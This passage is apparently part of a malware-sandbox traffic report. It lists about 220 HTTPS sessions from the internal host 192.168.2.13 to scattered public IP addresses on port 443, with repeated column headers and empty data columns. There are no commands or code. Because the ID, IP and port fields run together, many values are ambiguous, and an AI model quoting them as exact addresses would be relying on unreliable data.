                                                15068192.168.2.1356936202.190.88.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15069192.168.2.1333368128.37.59.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15070192.168.2.1338684109.115.4.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15071192.168.2.1340342178.54.131.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15072192.168.2.134066420.41.214.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15073192.168.2.13341129.145.42.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15074192.168.2.1342408174.81.34.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15075192.168.2.1352334111.192.72.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15076192.168.2.1334166116.168.5.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15077192.168.2.1340754218.166.217.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15078192.168.2.1350692121.141.141.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15079192.168.2.1357016210.31.195.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15080192.168.2.1354628202.106.50.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15081192.168.2.1333158144.46.213.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15082192.168.2.1337686213.166.171.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15083192.168.2.1333538163.142.75.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15084192.168.2.133297049.7.7.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15085192.168.2.135656292.45.177.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15086192.168.2.1338284119.62.47.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15087192.168.2.135797248.208.49.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15088192.168.2.1339138223.117.164.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15089192.168.2.133822231.5.173.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15090192.168.2.1351350107.56.166.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15091192.168.2.1343878159.84.62.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15092192.168.2.1341020191.244.255.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15093192.168.2.134202881.47.164.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15094192.168.2.1339468158.41.135.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15095192.168.2.135193258.255.99.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15096192.168.2.1345874144.164.189.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15097192.168.2.135025434.184.115.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15098192.168.2.1339582152.148.22.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15099192.168.2.1355880109.47.88.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15100192.168.2.1353986176.57.125.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15101192.168.2.133687262.127.234.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15102192.168.2.1356044142.14.102.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15103192.168.2.133326257.254.30.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15104192.168.2.1351940141.79.169.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15105192.168.2.133286695.50.167.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15106192.168.2.1358774116.119.236.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15107192.168.2.134143234.182.46.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15108192.168.2.134481424.113.50.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15109192.168.2.134564240.148.64.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15110192.168.2.1357704166.122.67.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15111192.168.2.1347186156.84.156.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15112192.168.2.135217649.58.116.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15113192.168.2.1353276176.211.174.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15114192.168.2.133770277.148.40.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15115192.168.2.1348800152.43.90.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15116192.168.2.134164639.31.16.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15117192.168.2.1344606184.109.151.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15118192.168.2.1337408177.69.207.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15119192.168.2.134825472.54.103.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15120192.168.2.1343288139.18.213.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15121192.168.2.135846870.11.59.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15122192.168.2.134806852.162.77.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15123192.168.2.1335124138.24.94.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15124192.168.2.1357346198.170.20.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15125192.168.2.134307493.55.216.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15126192.168.2.1351792183.217.36.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15127192.168.2.135921641.6.195.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15128192.168.2.1345632187.247.171.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15129192.168.2.1343730165.207.211.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15130192.168.2.135716034.28.231.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15131192.168.2.1352052154.186.127.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15132192.168.2.134083623.37.177.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15133192.168.2.1352112213.248.132.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15134192.168.2.134650879.142.144.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15135192.168.2.135914623.114.183.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15136192.168.2.134667638.41.208.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15137192.168.2.1360498149.45.37.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15138192.168.2.134572834.19.103.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15139192.168.2.1345868211.224.28.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15140192.168.2.1332862115.237.240.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15141192.168.2.1355484154.23.143.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15142192.168.2.135659262.232.28.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15143192.168.2.1354046108.213.151.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15144192.168.2.13608802.234.186.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15145192.168.2.134415212.159.192.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15146192.168.2.1340964221.232.117.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15147192.168.2.1335284198.223.241.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15148192.168.2.1339712200.50.44.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15149192.168.2.1343648201.74.41.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15150192.168.2.1360912161.191.109.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15151192.168.2.135177646.31.0.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15152192.168.2.1334588170.150.94.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15153192.168.2.133572241.168.134.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15154192.168.2.135871271.41.32.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15155192.168.2.135620642.205.254.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15156192.168.2.1355154103.191.17.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15157192.168.2.134826831.93.57.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15158192.168.2.135535625.237.83.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15159192.168.2.1336722183.249.196.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15160192.168.2.1356794163.240.101.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15161192.168.2.136032247.204.119.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15162192.168.2.13477229.196.62.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15163192.168.2.1353000109.241.238.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15164192.168.2.13513188.232.138.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15165192.168.2.133471443.234.247.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15166192.168.2.134795423.146.229.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15167192.168.2.1336550169.228.26.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15168192.168.2.1333256213.5.29.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15169192.168.2.1346002220.179.107.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15170192.168.2.134885873.195.230.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15171192.168.2.1344694134.41.215.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15172192.168.2.1355752210.41.216.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15173192.168.2.1354878199.109.189.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15174192.168.2.1343814144.3.27.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15175192.168.2.1358120133.38.134.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15176192.168.2.133484812.197.126.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15177192.168.2.135586275.78.242.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15178192.168.2.1339424144.178.38.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15179192.168.2.1345926120.196.9.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15180192.168.2.134666472.180.55.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15181192.168.2.1351714195.15.208.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15182192.168.2.1360070221.193.31.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15183192.168.2.133943624.103.8.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15184192.168.2.1357544126.12.142.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15185192.168.2.134468262.66.143.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15186192.168.2.134100443.110.97.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15187192.168.2.1344376197.174.181.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15188192.168.2.133703664.120.204.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15189192.168.2.1357452115.15.109.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15190192.168.2.1355966178.226.159.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15191192.168.2.1339918169.45.191.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192192.168.2.135750498.223.109.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15193192.168.2.1337996139.123.1.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15194192.168.2.1350236150.131.150.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15195192.168.2.134345632.127.80.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15196192.168.2.1358910219.189.202.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15197192.168.2.1334222201.210.98.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15198192.168.2.1355230170.128.13.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15199192.168.2.1359196120.199.52.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15200192.168.2.133503848.134.233.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15201192.168.2.135168612.166.72.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15202192.168.2.1353488114.245.213.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15203192.168.2.134489225.143.236.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15204192.168.2.1347966163.140.228.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15205192.168.2.1334288137.23.223.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15206192.168.2.1345884222.56.193.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15207192.168.2.1333504126.64.27.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15208192.168.2.1342850205.238.117.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15209192.168.2.134768023.88.14.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15210192.168.2.1333782125.147.200.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15211192.168.2.133310478.193.80.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15212192.168.2.1341450201.106.89.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15213192.168.2.135065882.99.217.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15214192.168.2.1356726176.6.148.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15215192.168.2.1340350101.73.72.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15216192.168.2.133592452.145.222.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15217192.168.2.135393620.227.170.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15218192.168.2.1333930142.254.110.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15219192.168.2.1353268187.172.252.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15220192.168.2.134408837.233.69.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15221192.168.2.1344828157.48.132.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15222192.168.2.1360768149.197.155.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15223192.168.2.135429075.6.181.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15224192.168.2.1355352198.212.80.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15225192.168.2.1345678212.113.43.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15226192.168.2.1352580139.58.139.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15227192.168.2.1358728203.10.249.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15228192.168.2.135361465.64.120.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15229192.168.2.1345346176.56.67.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15230192.168.2.1346270149.38.145.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15231192.168.2.133692682.23.217.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15232192.168.2.1358748164.201.151.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15233192.168.2.1343270167.8.147.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15234192.168.2.1340078199.19.144.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15235192.168.2.135466263.66.78.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15236192.168.2.133964446.169.243.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15237192.168.2.1350342118.226.26.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15238192.168.2.135533058.173.108.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15239192.168.2.1338028115.93.60.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15240192.168.2.1336488220.116.95.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15241192.168.2.1343862141.98.194.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15242192.168.2.135843492.115.221.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15243192.168.2.135146043.5.215.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15244192.168.2.1339128125.206.132.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15245192.168.2.133922094.59.119.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15246192.168.2.135600690.180.7.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15247192.168.2.1360648135.143.119.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15248192.168.2.13599804.176.173.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15249192.168.2.13491448.181.213.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15250192.168.2.1347488190.137.197.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15251192.168.2.134564670.8.238.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15252192.168.2.135757678.50.33.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15253192.168.2.1338396105.158.26.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15254192.168.2.135076699.50.248.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15255192.168.2.133367281.42.179.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15256192.168.2.133307250.37.72.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15257192.168.2.133692487.118.128.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15258192.168.2.133339062.25.128.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15259192.168.2.135861040.58.197.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15260192.168.2.134988872.165.130.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15261192.168.2.1359706105.246.141.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15262192.168.2.135058427.236.183.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15263192.168.2.135252096.156.195.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15264192.168.2.1347394153.224.53.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15265192.168.2.1335222149.14.58.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15266192.168.2.1342330116.197.193.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15267192.168.2.133843869.200.61.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15268192.168.2.1356068156.246.229.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15269192.168.2.133688249.66.234.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15270192.168.2.1338274110.48.238.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15271192.168.2.1343264172.244.82.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15272192.168.2.1346086131.8.212.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15273192.168.2.13535285.95.248.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15274192.168.2.1347024146.188.107.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15275192.168.2.1333010170.37.191.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15276192.168.2.1341546170.221.52.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15277192.168.2.134632838.185.68.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15278192.168.2.1346120160.32.19.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15279192.168.2.1357088126.235.153.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15280192.168.2.133952685.26.13.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15281192.168.2.134279432.24.34.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15282192.168.2.1347262128.219.84.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15283192.168.2.134023618.79.236.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15284192.168.2.1337742126.196.125.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15285192.168.2.1359822177.25.36.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15286192.168.2.133922689.86.246.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15287192.168.2.134372276.15.248.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15288192.168.2.1359304170.111.124.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15289192.168.2.1338102164.22.96.46443
                                                TimestampBytes transferredDirectionData


